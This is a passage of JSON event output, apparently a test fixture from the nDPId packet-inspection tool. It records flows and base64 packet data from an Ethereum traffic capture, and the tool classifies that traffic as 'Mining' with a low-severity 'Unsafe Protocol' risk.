00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364669,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364632,"flow_last_seen":1578508364670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1578508364670,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364682,"flow_last_seen":1578508364682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364682,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1578508364682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364682,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG833AqAG4MyZRtN04dl9aLQCVAAAAALAC\/\/+JqQAAAgQFtAEDAwUBAQgKItiU5gAAAAAEAgAA"}
01980{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1578508364694,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"thread_ts_msec":1578508364694,"pkt":"KDc3AG3IEBMx8Tl2CABFAASM2BBAADcR1ngiYawWwKgBuHZfdl8EeMBgH0wTNhnEtwanpj7oWlZ\/Hp0Gak0vyLNY48lrCKzEN97iWOlAwiKU8J2As0GDwpvqMobAk\/doYUwERgBj\/dX1qwI+w93bqV+opA8zeXK5DOY5QqaAWe1EmRlafyw14V0SAAT5BAv5BAP4TYRPFs69gun3gun3uECCARRJlalZmbRgrccKpmIFHuwcnfCnxRI\/PJfvccahZWq2zhSNF3xN8PFm4Ig97uMj8JcxYkHuXulMILJ8m+Dx+E2ENiSg04J2X4J2X7hAPRqHFTz0e8oEsmOadgUbUG0\/Gq1XFXFWshB59yMDlMnzDbSaQte3vRlNp0x8bXK\/C0IExkQW+7e6O42uaIsSOfhNhG\/lALSCTtaCTta4QNKaGvf27ePtI09PYWMWWoqsTgBFWVV\/OStWx2mo9mqS58z7TiK83yibq71BZSi0CSsekwb4Zyr8nj5zQd0mqCb4TYSkhGWfgnZfgnZfuEBoaZQlH\/tAMTmENPyYivdiK6qXFlTxe+\/p6cPLqiael7D6BFBiRXZHacw3oUOaGk4+u32W1NMUjoJXk06B2mEI+E2ELzgXtoJ2X4J2X7hAZ5DyvV4L2UjTbfMTNRlwVlkkGIIkt\/VYvYJ76IXUVE6r5fvcx+2tWoDAFaFaLZO1vJw5B3fbXfeObFaJ1qahJvhNhHLbOhmCTtaCTta4QOsAfRHCWayd+ePpaQzEOGf3dXjZZgxjuurzp9q\/DaDAlIrlX0hFIpZGowqYAlmPGRQlb2Zp7G196tUzRB5lA1D4TYRQniRSgnZfgnZfuEDy+3Y1qZpk8\/KZSHkhI\/dUtq2PmnojEAJ+pvc2bi3A23IJ6RM8OAW49hm6EgP+nw9QrdJ1FOvq3+1MzaqVwKmC+E2EI9yzYIJ2YIJ2YLhAOJyQU2JE6mr+PrqS1VpbvrNoILvKRQR+abFnLs+XgISTnL1u7Up3BqfrKb9hyDFv4+EivNbWhPn9c0jykBsfLvhNhC9ngvuCdmKCdmK4QMQewuj5qn6FtR+caLmA7fiCCCWlXl5n4eHsa\/hStv5IXJfR3qW2xYlmjRashSfhzXIk\/cArlEuFCVyLKkliTzj4TYR68x8XgglNgk7WuEDyUr+wEhCRTzC+abav+Qq8gCoJQuHHGbcH\/DZQmfl9EGgUirj+pxEJRc8L7rXREu747IWcesHQp9HRE6vORWkC+E2E1W2gk4Kvx4Kvx7hAdMXaCMYMMwBE0nd2ZguY7X9OffS41d7S\/Y+mPW\/bN2r4s5PDjCrWaOVF\/TvDBjFcUWsPiqOXMHIqsOoggNo9SvhNhE4vwp6Cdl+Cdl+4QPkOM4NqDnpAiCaFdcv7mpRSPLANloklV4wbFH\/35BGlAWuLnC96pYG30ySaUekbUEoxDdJFuDpuhxs7uesYXD\/4TYSOLK6TgnZhgnZhuEDoktJdZWuqibhkACX5AYXpi\/92jauNHaPZe57KQENT7f3lptm8vn\/KsHCyQGycNosbcDhgVNlPlUl4B5KRi2QIhF4WIGA="}
00906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1578508364694,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1578508364694,"pkt":"KDc3AG3IEBMx8Tl2CABFAAF02BFAADcR2Y8iYawWwKgBuHZfdl8BYBsKk2vVIKFBe5srt6TuKGLoSQyIYHTHTIh8E6CjfYCc9i8bqGNRb1RdySNn+Iv9WrBeYgM40YLK2f29HLFDjWvrLH5PzXOrZjlyFrfNSw\/LgHRZLq7JZkTKJJivek9A0KFTAQT49Pjt+E2EWSTXC4J2YYJ2YbhAKsm6hrEBgceppDA8y6y8ToI4LATCvXtK2lH6G5Ea4z\/xJThSCDAuG5MSvtPStPEkcnXcb7SOx0jpL4DMcyqusPhNhJ+KPreCdl+Cdl+4QFFks1Hi1w5Dzl6eTycY4XMH5jgPi\/IsM\/Xh\/aiCTq6KUBnNNvsH2QEEcq8Eurha1gzN35pyz9iUxxW+rcV0tUj4TYTPtOCBgg09gg09uEBD39Z7PE\/miF\/gBzQtLgOKuJmlQiP1\/EPNHjqCw\/jys2eg7dySq1uz5KP5CQPL3LPisAyyzl2cNiKWtBUo4PgQhF4WIGA="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1578508364697,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364697,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHkfoAAEARTtTAqAG4NiSg03Zfdl8As+iZ15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364697,"flow_last_seen":1578508364697,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364697,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364714,"flow_last_seen":1578508364714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364714,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1578508364714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSM3AqAG4UpHc+d05dl+ffKVSAAAAALAC\/\/\/0ywAAAgQFtAEDAwUBAQgKItiVBQAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1578508364717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364717,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMGVBhoKtkZwKgBuHZf3SMhYrdg7BRmI6AS\/ohxlQAAAgQFoAQCCAru0q\/IItiUTwEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1578508364717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364717,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNyDAqAG4aCrZGd0jdl\/sFGYjIWK3YYAQEAmOFAAAAQEICiLYlQju0q\/I"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":490,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1578508364719,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364714,"flow_last_seen":1578508364714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364714,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1578508364714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSM3AqAG4UpHc+d05dl+ffKVSAAAAALAC\/\/\/0ywAAAgQFtAEDAwUBAQgKItiVBQAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1578508364717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364717,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMGVBhoKtkZwKgBuHZf3SMhYrdg7BRmI6AS\/ohxlQAAAgQFoAQCCAru0q\/IItiUTwEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1578508364717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364717,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNyDAqAG4aCrZGd0jdl\/sFGYjIWK3YYAQEAmOFAAAAQEICiLYlQju0q\/I"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":490,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1578508364719,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
01871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1578508364729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1578508364729,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ7gO1AADART9iAADOMwKgBuHZfdl8EJxcg9PffAeslidE0A2XYKUWPfQSrSzELT24RQsZMkDFAUC\/8t71UobxaKgVF9YFxtOS9Li4RLrxMDnrT4k5PGgw2NDHZtKrKg8J\/d2YlScEj\/YBR+sG3bhx8yqSCwFLu+QmtAQT5A7r5A7L4TYRQniRSgnZfgnZfuEDy+3Y1qZpk8\/KZSHkhI\/dUtq2PmnojEAJ+pvc2bi3A23IJ6RM8OAW49hm6EgP+nw9QrdJ1FOvq3+1MzaqVwKmC+E2ETi\/CnoJ2X4J2X7hA+Q4zg2oOekCIJoV1y\/ualFI8sA2WiSVXjBsUf\/fkEaUBa4ucL3qlgbfTJJpR6RtQSjEN0kW4Om6HGzu56xhcP\/hNhF6CJvWCdl+Cdl+4QCa0AdVA2\/h5KxbzG7wSXhKLcgLDQf3VZM6j4pcDpEr22I0w8vjr3eeZrANzqy+B0k7Jw6sj9qOYOkYu9v1\/HcL4S4QXZGXDgsVFgLhA4dMHiHESZvaZv5XwOSEg7GIAhtTuq\/1+kuZamW7NEWy5Mx7jYjqriPSY+yi8MCrIJ809xx8ts8E05ybrI5RK9vhNhHTKaT+Cdl+Cdl+4QNscTNh1YzVnvcLB2a2lU2bz3gyaTlXXbE+pFLDVoDdFI5ADpod42cruH9wQt79YZLxlJa01FygTlV6X9wnzbsb4TYRSpWAfgnZhgnZhuECxFAegsyOgyfrql\/zztxCELDSekbbhUJf21H8iSNiW9cKP2xirrTz8RKLVHxNA2LkFNcMF8l9m+GUUJJ3wo0ve+E2EZ\/0rzIJ2X4J2X7hA0+1Q\/zfDwmqiJ4L7\/yvPXaADca3\/aoKeqi6XasejIDSTPmS2ILmdZ2LgwWGNQRAtsR66VqR5PIUppHE6JTXzu\/hNhC9aDGqCdl+Cdl+4QEWucUJTr5uswusybUrNZinvmACa+spHP3M8Ca80aMiKTDP2An9QqqbsJgkcvDnFqQSdwmVB0j3FFWWOWXchmBH4TYQ03B+BglLcglLcuEC4ECYNzxwi2kJoJQjyJ6lUniuRlC+UndNWqAZRufW0X533Ymm1WtW8x0w\/1eGqPwGeOGNfU57w7mmrZv5S0MuC+E2EoBCKUoJ2X4J2X7hA7pvrsi4uzujUwcCnzbOXM3k+PSTxp6vSaGlZ+vjNNS2DLnFg12pt76j1a3+aMxZ2sjeuJ4ACTqyhbBihj1yObfhNhLB96meCdl+Cdl+4QMGwHxHg22IaagGZCrHWyox4ceWSrkz5+TUJ7FvSKEAsyUrKnBQ1BKg4U4OyDXv653Ump5Su2Klg\/PAjth\/4FVX4TYQDCFzcgnZfgnZfuEAOe5LjgOGocDnrwWucrGwohrnh\/PIVvUNi2EPcxA3lL9o2I1kGKrrcltIHdy07g5GmzReWD9IntTCd9ncDRnHuhF4WIGA="}
01011{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1578508364729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364729,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFgO5AADARUk2AADOMwKgBuHZfdl8BsUbFE+HTPyEyomNSay73CyfrLD8rHnhX7vxj92G3He3rB8i3yggvxA3gI120fMxC8T5NSVg69zUML0xXdXDn6x+i1UJlYzm2ZsL8HkXRcVxsD7\/Cz8uc2cDeR5GmI31rs3BBAAT5AUT5ATz4TYRWzyr3gnZfgnZfuEAwPG4npPFCKterF6wXX6hmKDtHpPLV5Gpyh4HRvQlb1WOtMBiFa5iB1p48IlU7yQzlUhHlEKU2TAWk+UxWCOtE+E2EwKkGMYJ2X4J2X7hAXDWjwnntCdEfY7ZsbIcma6dZim0sS\/6AZlg+cBMsOylaupmT4K85DC7A88jAAB9\/AkNP7Q7FRuWOzTw655z20fhNhF\/YD6SCdl+Cdl+4QMhe7o3oH5yNMBpAbg7BFfLQiRhzAx0IcRlGupvV\/Zui89t4l4x5tGAZhBv4cgNKbiHVFqGfCeCtDh7KA5ZNUtn4TYQ2yX4zgnZfgnZfuEBWXo894U5qji3Sd9oPTupJEBwpi5JkOWop7uGO9PMehSCnS4eHg4+tauk7NJIwG19teeCjKxS93DtycMhLIWGEhF4WIGA="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1578508364732,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508364732,"pkt":"EBMx8Tl2KDc3AG3ICABFAACccxcAAEAR1EDAqAG4b+UAtHZfTtYAiDTvS0gyrIvyYAXql+rzEz+AR\/cLOiJor5McpZ3aQTzvVtbxvdlPVHOvm8x2T63kxRajQJXVXM7hf79y1fQG9XWokxXgcqkKLlUPoIFVVYrTntTkZjbBJdoltYqy5v2xN8\/CAAHdBMuEfwAAAYJ2X4J2X8mEb+UAtIJO1oCEXhYgYAU="}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1578508364751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364751,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGCIIzJlG0wKgBuHZf3ThkB68VWi0AlqAScSALcgAAAgQFrAQCCAqBHInXItiU5gEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1578508364751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364751,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG84nAqAG4MyZRtN04dl9aLQCWZAevFoAQECya6gAAAQEICiLYlSaBHInX"}
00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364682,"flow_last_seen":1578508364752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1578508364752,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1578508364751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364751,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGCIIzJlG0wKgBuHZf3ThkB68VWi0AlqAScSALcgAAAgQFrAQCCAqBHInXItiU5gEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1578508364751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364751,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG84nAqAG4MyZRtN04dl9aLQCWZAevFoAQECya6gAAAQEICiLYlSaBHInX"}
00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364682,"flow_last_seen":1578508364752,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1578508364752,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
01977{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1578508364773,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"thread_ts_msec":1578508364773,"pkt":"KDc3AG3IEBMx8Tl2CABFGASMuzZAAC8R8ro2JKDTwKgBuHZfdl8EeHOhfS8\/VKeU4xriCeJZNmbyiR29m3N42\/uIKvLbiJlgdyaSwrO2BgcDcenrD2C97edthDBouwifboHgE3u3hLHcQi8I2aNx02z5+NzOkszQMNgplhV2V\/wYwtE8G8IvYQ3cAAT5BAv5BAP4TYRPFs69gun3gun3uECCARRJlalZmbRgrccKpmIFHuwcnfCnxRI\/PJfvccahZWq2zhSNF3xN8PFm4Ig97uMj8JcxYkHuXulMILJ8m+Dx+E2E0WGPAYLDUILDULhAQhNvCoDxAncltx4bh9WffZwzBdE\/9xF06wXJo57MMUhoLLSI90CIePrV\/tYmYiKEiyDSrJDYOlCFHmZ3pqDCwfhNhGoMJ6iCdn2Cdn24QH6QBf7Np\/9Y+eiOrugFzIsIhVcNcp\/OYct+34QkqEfvlXbuNfWnoEs1IzwGORRl6zR7xwwZW1+45dnGnJxxFET4TYTAnuIugnZfgnZfuECuDYcQjm3wJMglum1qnPXPBozHysGZ9VxiaJNnx\/kw7dAhqZoxI6CdfBdLdPaGhgI412g7XwrxymiHNjtEpybV+E2Eb+UAtIJO1oJO1rhA0poa9\/bt4+0jT09hYxZaiqxOAEVZVX85K1bHaaj2apLnzPtOIrzfKJurvUFlKLQJKx6TBvhnKvyePnNB3SaoJvhNhKSEZZ+Cdl+Cdl+4QGhplCUf+0AxOYQ0\/JiK92IrqpcWVPF77+npw8uqJp6XsPoEUGJFdkdpzDehQ5oaTj67fZbU0xSOgleTToHaYQj4TYSygMxlgsNQgsN